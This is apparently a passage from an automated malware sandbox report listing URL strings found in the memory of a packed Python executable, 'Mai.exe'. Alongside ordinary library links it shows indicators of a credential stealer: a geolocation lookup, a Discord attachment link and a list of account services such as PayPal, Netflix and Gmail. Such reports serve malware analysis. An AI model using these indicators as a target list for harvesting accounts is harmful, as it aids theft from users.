                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/%
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com)z
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2270682947.000001995F0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
                  Source: Mai.exe, 00000002.00000003.2746100799.00000228ED7C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packagingMEI76562
                  Source: Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
                  Source: Mai.exe, 00000004.00000002.2710896612.000001995E200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                  Source: Mai.exe, 00000004.00000003.1533281148.000001995E02F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1537127365.000001995E045000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1534499254.000001995E02F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1535067924.000001995E024000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1533206807.000001995E0A7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2708791317.000001995DEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396d__
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                  Source: Mai.exe, 00000004.00000003.2455637329.000001995E65C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718278386.000001995E65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)z
                  Source: Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2264338939.000001995E474000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2301099993.000001995E478000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299599683.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276009216.000001995F0A0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2716427128.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2260377437.000001995E461000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                  Source: Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2264338939.000001995E474000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2301099993.000001995E478000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2716427128.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2260377437.000001995E461000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2325267932.000001995E4E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2265641133.000001995E477000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2570619662.000001995E4E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                  Source: Mai.exe, 00000004.00000003.2346707811.000001995DF94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)z
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2329423223.000001995DF9D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2314212501.000001995DF99000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299441984.000001995DF94000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2243653238.000001995DF8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                  Source: Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2639281386.000001995E69F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2147888420.000001995E598000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2206789344.000001995E598000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2325267932.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718685846.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2322703546.000001995E598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                  Source: Mai.exe, 00000004.00000003.2240778291.000001995E4CF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2251769895.000001995E4D0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2278148627.000001995E4D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2304646110.000001995E4DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)z
                  Source: Mai.exe, 00000004.00000003.2238942833.000001995E48A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1111364024408494140/1111364181032177766/cs.png
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1111364024408494140/1111364181032177766/cs.pngrY
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minecraft.net)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://minecraft.net)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://netflix.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netflix.com)z
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2349801232.000001995F0E7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F3E1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2273733798.000001995F0D4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2270682947.000001995F0D3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2476027182.000001995F0E7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720746733.000001995F0E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://origin.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://origin.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)z&
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
                  Source: Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2320826704.000001995E458000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552591972.000001995E403000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2305500569.000001995E44F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2334629897.000001995E45B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545696959.000001995E40E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1553018358.000001995E43E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)z
                  Source: Mai.exe, 00000004.00000002.2710653936.000001995E100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
                  Source: Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/PJ
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)z
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/wtf
